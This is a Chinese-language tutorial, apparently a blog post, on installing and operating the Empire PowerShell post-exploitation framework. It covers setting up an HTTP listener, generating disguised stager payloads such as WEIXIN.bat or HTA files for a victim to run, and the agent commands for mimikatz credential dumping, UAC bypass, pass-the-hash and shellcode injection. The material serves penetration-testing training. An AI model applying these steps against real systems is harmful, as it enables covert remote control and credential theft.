简介
Empire是一个纯粹的PowerShell开发后代理,基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能,而无需powershell.exe,从关键记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通信以逃避网络检测,所有这些都封装在以可用性为重点的框架中。它于2015年在BSidesLV上首次亮相。
安装
正常情况下
apt-get(具有一定的成功率)
#########################################
新版的不用安装,默认已经安装好了
#########################################
旧版的需要进行手动安装
sudo apt-get update
#更新库
sudo apt-get install powershell-empire -y
#安装
###########################
要先打开服务端,在打开客户端
sudo powershell-empire server
#打开empire的服务端
sudo powershell-empire client
#打开客户端,自动连接服务端
apt不行的情况下
github克隆
git clone --recursive https://github.com.cnpmjs.org/BC-SECURITY/Empire.git
#下载Empire(可能会网络不稳定)
cd Empire
#PIP3安装
wget https://bootstrap.pypa.io/get-pip.py
python3 get-pip.py
pip install -r requirements.txt -i https://pypi.douban.com/simple
#批量安装所需要的Python模块
M2Crypto报错-》sudo apt install libssl-dev swig
# 安装依赖项
sudo ./setup/install.sh (KALI源不换会很慢)
vim /etc/apt/sources.list
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
pip install poetry (可选)
sudo poetry install
#poetry是Python中用于依赖项管理和打包的工具(可选)
sudo poetry run python empire (可选)
./Empire/setup/reset.sh
#重置empire
./empire 或 python3 empire
#运行empire
github下载官网:
https://github.com/BC-SECURITY/Empire/
官方文档(很久没更新,具体使用还得自己研究)
http://www.powershellempire.com/
使用流程
监听
(Empire) > uselistener http
#打开监听模块
(Empire: listeners/http) > info
#查看当前模块信息
(Empire: uselistener/http) > options
#查看当前模块的配置信息(true的就是需要进行配置的设置)
#设置参数:Name、Port、HOST (这里注意要区分大小写)
set Name L1
set Port 2222
set HOST 192.168.31.24
(Empire: listeners/http) > execute
#执行监听模块
生成stager
(Empire: listeners) > usestager windows/launcher_bat
#使用launcher_bat模块生成payload
#这个模块目前好像是不生效的,改用windows/hta模块实测有效(不开windows防护可连接,开防护连接不上)
(Empire: stager/windows/launcher_bat) > options
#查看参数
(Empire: stager/windows/launcher_bat) > set Listener L1
#匹配监听器(监听器名称)
(Empire: stager/windows/launcher_bat) > set OutFile /root/Desktop/WEIXIN.bat
#设置输出文件的存放位置和文件名(发现你路径不管设置什么,最终生成的位置都是固定的)
客户端下载执行stager
Active agents: 如果agents是绿色的, 代表是存活的;如果是红色, 那就是掉线的状态.
###########################################
在目标主机下载运行之后,在我们的控制面版会提示:[+] New agent 7FMR6XES checked in,这时候就可以查看下会话连接情况
(Empire: usestager/windows_hta) > agents
#查看连接的会话列表
(Empire)> 模式命令
help = ? 帮助命令
agents 查看代理,进入用户菜单
creds 存放用户的凭据信息 (前提是获取到mimikatz的HASH值)
interact 进入到交互模式
list 列出存活的代理或者监听器
searchmodule 搜索模块
set 设置参数
show 显示参数
uselistener 使用监听器(创建)
usemodule 使用模块
listeners 监听模块
kail id/all 杀死进程
remove id/all 清除代理
interact(shell)命令
可以用help查看可以使用的命令
interact --> 进入到交互模式
kill --> 杀死会话
killdate --> 指定日期杀死会话 killdate [agent/all] 01/01/2016
rename --> 给agents重命名
searchmodule --> 搜索模块
bypassuac + 监听进程名--> bypassuac提权
jobs --> 查看工作中的任务
ps -->获取进程
mimikatz --> 前提:提权。抓取账号密码(hashdump)
creds --> 查看账号密码
psinject --> 利用shellcode进程迁移
pth --> pass the hash
shell + cmd命令 --> 用cmd执行指令
sysinfo --> 获取系统基本信息
spawn --> 生成新的agent
(Empire: 1) > spawn $Listenname
sc --> 截屏
injectshellcode --> 利用shellcode进程迁移到meterpreter
bypassuac --> 在windows10中失效